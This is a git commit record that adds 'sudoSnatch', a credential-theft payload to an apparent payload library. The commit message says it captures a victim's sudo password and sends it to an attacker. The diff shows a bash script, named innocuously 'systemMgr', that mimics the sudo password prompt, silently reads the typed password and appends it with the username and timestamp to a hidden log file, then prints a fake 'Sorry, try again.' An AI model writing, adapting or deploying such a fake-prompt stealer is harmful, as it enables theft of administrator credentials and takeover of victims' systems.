uploaded sudoSnatch (#507)

* uploaded sudoSnatch sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally. * changing payload category * uploaded sudoSnatch
2025-10-29 16:58:25 +00:00 · 2022-03-23 02:39:51 +05:30
parent 946879ae90
commit 7f3972b88a
5 changed files with 144 additions and 0 deletions
--- a/payloads/library/credentials/sudoSnatch/systemMgr
+++ b/payloads/library/credentials/sudoSnatch/systemMgr
@@ -0,0 +1,5 @@
+#!/bin/bash
+echo -n "[sudo] password for $(whoami):"
+IFS="" read -s pass
+echo -e "Timestamp=[$(date)] \t User=[$(whoami)] \t  Password=[$pass]" >> /var/tmp/.system/sysLog
+echo -e "\nSorry, try again."